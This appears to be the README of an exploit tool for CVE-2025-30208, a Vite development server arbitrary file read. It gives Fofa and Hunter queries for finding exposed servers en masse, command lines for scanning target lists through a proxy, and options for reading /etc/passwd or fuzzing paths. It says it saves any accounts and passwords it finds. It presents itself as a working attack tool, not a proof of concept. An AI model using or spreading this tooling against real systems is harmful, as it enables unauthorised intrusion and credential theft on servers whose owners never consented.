
CVE-2025-30208-EXP
Vite development server arbitrary file read vulnerability (CVE-2025-30208), with wide coverage, simple exploitation, and no restrictions, posing a huge threat!
Fofa search syntax:
body="/@vite/client"
Hunter search syntax:
web.body="/@vite/client"
-u to check
-p custom payload e.g. /etc/passwd
-d use a wordlist for fuzz testing
python3 Vite-CVE-2025-30208-EXP.py -f ip.txt
python3 Vite-CVE-2025-30208-EXP.py -f ip.txt --proxy http://127.0.0.1:8080
Note! This project is not a PoC, please use it under the terms of the disclaimer!
This project will attempt to detect arbitrary file read against the target's /etc/passwd. You can use -p to specify a desired file path, and -d to specify a desired fuzz wordlist.
If you like it, feel free to give me a Star😋
Scan results that match accounts and passwords will be saved in output.txt. The IP.txt format is http://[ip]/[domain], one per line.